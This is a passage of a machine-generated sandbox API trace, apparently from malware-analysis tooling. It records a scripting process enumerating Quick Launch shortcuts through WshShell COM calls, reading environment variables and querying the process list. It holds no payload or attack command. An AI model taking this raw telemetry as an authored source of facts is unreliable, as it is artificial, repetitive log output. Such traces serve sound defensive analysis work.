Files (x86)\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE") returned 0x41 [0167.069] WshShell:IUnknown:Release (This=0x283d50) returned 0x2 [0167.069] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\microsoft outlook.lnk")) returned 0x20 [0167.069] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk")) returned 0x20 [0167.070] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5e [0167.070] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk", nBufferLength=0x5e, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk", lpFilePart=0x0) returned 0x5d [0167.071] CoGetContextToken (in: pToken=0x5a0dca4 | out: pToken=0x5a0dca4) returned 0x0 [0167.071] WshShell:IUnknown:QueryInterface (in: This=0x283d34, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dd10 | out: ppvObject=0x5a0dd10*=0x283d20) returned 0x0 [0167.071] WshShell:IDispatch:Invoke (in: This=0x283d20, dispIdMember=1002, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0e0c4*(rgvarg=([0]=0x5a0e0b4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x5a0e0a4, pExcepInfo=0x5a0e084, puArgErr=0x5a0e080 | out: pDispParams=0x5a0e0c4*(rgvarg=([0]=0x5a0e0b4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x5a0e0a4*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x283d88, varVal2=0x0), pExcepInfo=0x5a0e084*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0e080*=0x0) returned 0x0 [0167.078] WshShell:IUnknown:QueryInterface (in: This=0x283d88, riid=0x71cb2a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0db3c | out: ppvObject=0x5a0db3c*=0x283d98) returned 0x0 [0167.078] WshShell:IUnknown:QueryInterface (in: This=0x283d98, riid=0x71da1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5a0daf0 | out: ppvObject=0x5a0daf0*=0x0) returned 0x80004002 [0167.078] WshShell:IUnknown:QueryInterface (in: This=0x283d98, riid=0x71da1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5a0d918 | out: ppvObject=0x5a0d918*=0x283da8) returned 0x0 [0167.078] WshShell:IProvideClassInfo:GetClassInfo (in: This=0x283da8, ppTI=0x5a0d920 | out: ppTI=0x5a0d920*=0x5c3dcf8) returned 0x0 [0167.078] ITypeInfo:RemoteGetTypeAttr (in: This=0x5c3dcf8, ppTypeAttr=0x5a0d914, pDummy=0x40e4bc9c | out: ppTypeAttr=0x5a0d914, pDummy=0x40e4bc9c) returned 0x0 [0167.078] ITypeInfo:LocalReleaseTypeAttr (This=0x5c3dcf8) returned 0x62ae0e8 [0167.078] WshShell:IUnknown:Release (This=0x283da8) returned 0x2 [0167.078] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x3 [0167.079] WshShell:IUnknown:AddRef (This=0x283d98) returned 0x3 [0167.079] WshShell:IUnknown:QueryInterface (in: This=0x283d98, riid=0x71da182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x5a0d44c | out: ppvObject=0x5a0d44c*=0x0) returned 0x80004002 [0167.079] WshShell:IUnknown:QueryInterface (in: This=0x283d98, riid=0x71da1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x5a0d3fc | out: ppvObject=0x5a0d3fc*=0x0) returned 0x80004002 [0167.079] WshShell:IUnknown:QueryInterface (in: This=0x283d98, riid=0x71cd1388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d408 | out: ppvObject=0x5a0d408*=0x0) returned 0x80004002 [0167.079] CoGetContextToken (in: pToken=0x5a0d468 | out: pToken=0x5a0d468) returned 0x0 [0167.079] CoGetContextToken (in: pToken=0x5a0d87c | out: pToken=0x5a0d87c) returned 0x0 [0167.079] WshShell:IUnknown:QueryInterface (in: This=0x283d98, riid=0x71da1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d8fc | out: ppvObject=0x5a0d8fc*=0x0) returned 0x80004002 [0167.079] WshShell:IUnknown:Release (This=0x283d98) returned 0x2 [0167.079] WshShell:IUnknown:Release (This=0x283d20) returned 0x2 [0167.079] CoGetContextToken (in: pToken=0x5a0df04 | out: pToken=0x5a0df04) returned 0x0 [0167.080] CoGetContextToken (in: pToken=0x5a0de64 | out: pToken=0x5a0de64) returned 0x0 [0167.080] WshShell:IUnknown:QueryInterface (in: This=0x283d98, riid=0x5a0df34*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0df30 | out: ppvObject=0x5a0df30*=0x283d88) returned 0x0 [0167.080] WshShell:IUnknown:AddRef (This=0x283d88) returned 0x3 [0167.080] WshShell:IUnknown:Release (This=0x283d88) returned 0x2 [0167.080] WshShell:IDispatch:GetTypeInfoCount (in: This=0x283d88, pctinfo=0x5a0df8c | out: pctinfo=0x5a0df8c) returned 0x0 [0167.080] WshShell:IDispatch:GetTypeInfo (in: This=0x283d88, iTInfo=0x0, lcid=0x0, ppTInfo=0x5a0df88 | out: ppTInfo=0x5a0df88*=0x5c3dcf8) returned 0x0 [0167.080] WshShell:IUnknown:QueryInterface (in: This=0x5c3dcf8, riid=0x71cb2a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0da8c | out: ppvObject=0x5a0da8c*=0x5c3dcf8) returned 0x0 [0167.080] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x4 [0167.080] CoGetContextToken (in: pToken=0x5a0ddac | out: pToken=0x5a0ddac) returned 0x0 [0167.080] WshShell:IUnknown:AddRef (This=0x5c3dcf8) returned 0x5 [0167.080] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x4 [0167.080] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x3 [0167.080] ITypeInfo:RemoteGetTypeAttr (in: This=0x5c3dcf8, ppTypeAttr=0x5a0df8c, pDummy=0x44f89ed2 | out: ppTypeAttr=0x5a0df8c, pDummy=0x44f89ed2) returned 0x0 [0167.081] ITypeInfo:LocalReleaseTypeAttr (This=0x5c3dcf8) returned 0x62ae0e8 [0167.081] CoGetContextToken (in: pToken=0x5a0dccc | out: pToken=0x5a0dccc) returned 0x0 [0167.081] WshShell:IUnknown:QueryInterface (in: This=0x283d98, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dd3c | out: ppvObject=0x5a0dd3c*=0x283d88) returned 0x0 [0167.081] WshShell:IDispatch:Invoke (in: This=0x283d88, dispIdMember=1005, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0e0e0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0e0d0, pExcepInfo=0x5a0e0b0, puArgErr=0x5a0e0ac | out: pDispParams=0x5a0e0e0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0e0d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), pExcepInfo=0x5a0e0b0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0e0ac*=0x0) returned 0x0 [0167.084] SysStringLen (param_1="") returned 0x0 [0167.085] WshShell:IUnknown:Release (This=0x283d88) returned 0x2 [0167.085] CoGetContextToken (in: pToken=0x5a0dccc | out: pToken=0x5a0dccc) returned 0x0 [0167.085] WshShell:IUnknown:QueryInterface (in: This=0x283d98, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dd3c | out: ppvObject=0x5a0dd3c*=0x283d88) returned 0x0 [0167.085] WshShell:IDispatch:Invoke (in: This=0x283d88, dispIdMember=1005, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0e0e0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0e0d0, pExcepInfo=0x5a0e0b0, puArgErr=0x5a0e0ac | out: pDispParams=0x5a0e0e0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0e0d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), pExcepInfo=0x5a0e0b0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0e0ac*=0x0) returned 0x0 [0167.085] SysStringLen (param_1="") returned 0x0 [0167.085] WshShell:IUnknown:Release (This=0x283d88) returned 0x2 [0167.085] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk")) returned 0x20 [0167.086] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk")) returned 0x20 [0167.087] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x60 [0167.087] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk", nBufferLength=0x60, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk", lpFilePart=0x0) returned 0x5f [0167.087] CoGetContextToken (in: pToken=0x5a0dca4 | out: pToken=0x5a0dca4) returned 0x0 [0167.087] WshShell:IUnknown:QueryInterface (in: This=0x283d34, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dd10 | out: ppvObject=0x5a0dd10*=0x283d20) returned 0x0 [0167.088] WshShell:IDispatch:Invoke (in: This=0x283d20, dispIdMember=1002, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0e0c4*(rgvarg=([0]=0x5a0e0b4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk"), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x5a0e0a4, pExcepInfo=0x5a0e084, puArgErr=0x5a0e080 | out: pDispParams=0x5a0e0c4*(rgvarg=([0]=0x5a0e0b4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x5a0e0a4*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x285288, varVal2=0x0), pExcepInfo=0x5a0e084*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0e080*=0x0) returned 0x0 [0167.094] WshShell:IUnknown:QueryInterface (in: This=0x285288, riid=0x71cb2a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0db3c | out: ppvObject=0x5a0db3c*=0x285298) returned 0x0 [0167.094] WshShell:IUnknown:QueryInterface (in: This=0x285298, riid=0x71da1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5a0daf0 | out: ppvObject=0x5a0daf0*=0x0) returned 0x80004002 [0167.094] WshShell:IUnknown:QueryInterface (in: This=0x285298, riid=0x71da1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5a0d918 | out: ppvObject=0x5a0d918*=0x2852a8) returned 0x0 [0167.095] WshShell:IProvideClassInfo:GetClassInfo (in: This=0x2852a8, ppTI=0x5a0d920 | out: ppTI=0x5a0d920*=0x5c3dcf8) returned 0x0 [0167.095] ITypeInfo:RemoteGetTypeAttr (in: This=0x5c3dcf8, ppTypeAttr=0x5a0d914, pDummy=0x40e4bc9c | out: ppTypeAttr=0x5a0d914, pDummy=0x40e4bc9c) returned 0x0 [0167.095] ITypeInfo:LocalReleaseTypeAttr (This=0x5c3dcf8) returned 0x62ae0e8 [0167.095] WshShell:IUnknown:Release (This=0x2852a8) returned 0x2 [0167.095] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x3 [0167.095] WshShell:IUnknown:AddRef (This=0x285298) returned 0x3 [0167.095] WshShell:IUnknown:QueryInterface (in: This=0x285298, riid=0x71da182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x5a0d44c | out: ppvObject=0x5a0d44c*=0x0) returned 0x80004002 [0167.095] WshShell:IUnknown:QueryInterface (in: This=0x285298, riid=0x71da1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x5a0d3fc | out: ppvObject=0x5a0d3fc*=0x0) returned 0x80004002 [0167.095] WshShell:IUnknown:QueryInterface (in: This=0x285298, riid=0x71cd1388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d408 | out: ppvObject=0x5a0d408*=0x0) returned 0x80004002 [0167.095] CoGetContextToken (in: pToken=0x5a0d468 | out: pToken=0x5a0d468) returned 0x0 [0167.095] CoGetContextToken (in: pToken=0x5a0d87c | out: pToken=0x5a0d87c) returned 0x0 [0167.095] WshShell:IUnknown:QueryInterface (in: This=0x285298, riid=0x71da1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d8fc | out: ppvObject=0x5a0d8fc*=0x0) returned 0x80004002 [0167.096] WshShell:IUnknown:Release (This=0x285298) returned 0x2 [0167.096] WshShell:IUnknown:Release (This=0x283d20) returned 0x2 [0167.096] CoGetContextToken (in: pToken=0x5a0df04 | out: pToken=0x5a0df04) returned 0x0 [0167.096] CoGetContextToken (in: pToken=0x5a0de64 | out: pToken=0x5a0de64) returned 0x0 [0167.096] WshShell:IUnknown:QueryInterface (in: This=0x285298, riid=0x5a0df34*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0df30 | out: ppvObject=0x5a0df30*=0x285288) returned 0x0 [0167.096] WshShell:IUnknown:AddRef (This=0x285288) returned 0x3 [0167.096] WshShell:IUnknown:Release (This=0x285288) returned 0x2 [0167.096] WshShell:IDispatch:GetTypeInfoCount (in: This=0x285288, pctinfo=0x5a0df8c | out: pctinfo=0x5a0df8c) returned 0x0 [0167.096] WshShell:IDispatch:GetTypeInfo (in: This=0x285288, iTInfo=0x0, lcid=0x0, ppTInfo=0x5a0df88 | out: ppTInfo=0x5a0df88*=0x5c3dcf8) returned 0x0 [0167.096] WshShell:IUnknown:QueryInterface (in: This=0x5c3dcf8, riid=0x71cb2a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0da8c | out: ppvObject=0x5a0da8c*=0x5c3dcf8) returned 0x0 [0167.096] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x4 [0167.096] CoGetContextToken (in: pToken=0x5a0ddac | out: pToken=0x5a0ddac) returned 0x0 [0167.096] WshShell:IUnknown:AddRef (This=0x5c3dcf8) returned 0x5 [0167.096] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x4 [0167.096] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x3 [0167.097] ITypeInfo:RemoteGetTypeAttr (in: This=0x5c3dcf8, ppTypeAttr=0x5a0df8c, pDummy=0x44f89ed2 | out: ppTypeAttr=0x5a0df8c, pDummy=0x44f89ed2) returned 0x0 [0167.097] ITypeInfo:LocalReleaseTypeAttr (This=0x5c3dcf8) returned 0x62ae0e8 [0167.097] CoGetContextToken (in: pToken=0x5a0dccc | out: pToken=0x5a0dccc) returned 0x0 [0167.097] WshShell:IUnknown:QueryInterface (in: This=0x285298, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dd3c | out: ppvObject=0x5a0dd3c*=0x285288) returned 0x0 [0167.097] WshShell:IDispatch:Invoke (in: This=0x285288, dispIdMember=1005, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0e0e0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0e0d0, pExcepInfo=0x5a0e0b0, puArgErr=0x5a0e0ac | out: pDispParams=0x5a0e0e0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0e0d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), pExcepInfo=0x5a0e0b0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0e0ac*=0x0) returned 0x0 [0167.097] SysStringLen (param_1="") returned 0x0 [0167.098] WshShell:IUnknown:Release (This=0x285288) returned 0x2 [0167.098] CoGetContextToken (in: pToken=0x5a0dccc | out: pToken=0x5a0dccc) returned 0x0 [0167.098] WshShell:IUnknown:QueryInterface (in: This=0x285298, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dd3c | out: ppvObject=0x5a0dd3c*=0x285288) returned 0x0 [0167.098] WshShell:IDispatch:Invoke (in: This=0x285288, dispIdMember=1005, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0e0e0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0e0d0, pExcepInfo=0x5a0e0b0, puArgErr=0x5a0e0ac | out: pDispParams=0x5a0e0e0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0e0d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), pExcepInfo=0x5a0e0b0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0e0ac*=0x0) returned 0x0 [0167.098] SysStringLen (param_1="") returned 0x0 [0167.098] WshShell:IUnknown:Release (This=0x285288) returned 0x2 [0167.098] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk")) returned 0x20 [0167.098] EtwEventActivityIdControl () returned 0x0 [0167.099] EtwEventActivityIdControl () returned 0x0 [0167.099] EtwEventActivityIdControl () returned 0x0 [0167.099] EtwEventActivityIdControl () returned 0x0 [0167.099] EtwEventActivityIdControl () returned 0x0 [0167.099] EtwEventActivityIdControl () returned 0x0 [0167.099] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e4e8, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0167.152] EtwEventActivityIdControl () returned 0x0 [0167.152] EtwEventActivityIdControl () returned 0x0 [0167.152] EtwEventActivityIdControl () returned 0x0 [0167.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3289540, Length=0x20000, ResultLength=0x5a0e6e4 | out: SystemInformation=0x3289540, ResultLength=0x5a0e6e4*=0xca30) returned 0x0 [0167.424] EtwEventActivityIdControl () returned 0x0 [0167.424] EtwEventActivityIdControl () returned 0x0 [0167.424] EtwEventActivityIdControl () returned 0x0 [0167.424] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0d58c, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0167.425] EtwEventActivityIdControl () returned 0x0 [0167.425] EtwEventActivityIdControl () returned 0x0 [0167.425] EtwEventActivityIdControl () returned 0x0 [0167.425] EtwEventActivityIdControl () returned 0x0 [0167.426] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x568 [0167.426] EtwEventActivityIdControl () returned 0x0 [0167.426] EtwEventActivityIdControl () returned 0x0 [0167.426] EtwEventActivityIdControl () returned 0x0 [0167.426] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0cea8, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0167.427] EtwEventActivityIdControl () returned 0x0 [0167.427] EtwEventActivityIdControl () returned 0x0 [0167.427] EtwEventActivityIdControl () returned 0x0 [0167.428] EtwEventActivityIdControl () returned 0x0 [0167.469] EtwEventActivityIdControl () returned 0x0 [0167.469] EtwEventActivityIdControl () returned 0x0 [0167.469] EtwEventActivityIdControl () returned 0x0 [0167.469] EtwEventActivityIdControl () returned 0x0 [0167.469] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0dd5c | out: lpConsoleScreenBufferInfo=0x5a0dd5c) returned 1 [0167.470] EtwEventActivityIdControl () returned 0x0 [0167.470] EtwEventActivityIdControl () returned 0x0 [0167.470] EtwEventActivityIdControl () returned 0x0 [0167.471] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0d58c, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0167.471] EtwEventActivityIdControl () returned 0x0 [0167.471] EtwEventActivityIdControl () returned 0x0 [0167.472] EtwEventActivityIdControl () returned 0x0 [0167.472] EtwEventActivityIdControl () returned 0x0 [0167.472] EtwEventActivityIdControl () returned 0x0 [0167.472] EtwEventActivityIdControl () returned 0x0 [0167.476] EtwEventActivityIdControl () returned 0x0 [0167.476] EtwEventActivityIdControl () returned 0x0 [0167.476] EtwEventActivityIdControl () returned 0x0 [0167.476] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0d58c, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0167.477] EtwEventActivityIdControl () returned 0x0 [0167.477] EtwEventActivityIdControl () returned 0x0 